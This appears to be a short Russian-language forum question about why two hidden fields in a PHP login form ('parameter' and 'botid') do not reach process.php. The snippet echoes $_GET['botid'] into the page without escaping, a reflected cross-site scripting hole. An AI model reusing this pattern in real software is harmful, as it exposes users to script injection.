PHP:
$parameter = "blank";
$botid = $_GET['botid'];
HTML:
<form action="process.php" method="post">
<input type="text" class="field-password" id="password" name="login" placeholder="login">
<input type="email" class="field" id="email" name="email" placeholder="Email Address" autocomplete="off">
<input type="hidden" name="parameter" value="<?=$parameter ?>" />
<input type="hidden" name="botid" value="<?=$botid ?>" />
<input type="password" class="field-password" id="password" name="password" placeholder="Password">
<input type="submit" class="button" name="submit" id="input_next1" value="Log In">
</form>
в файле process.php просто print_r($_POST); передаётся всё кроме parameter и botid, что делать что бы они передавались?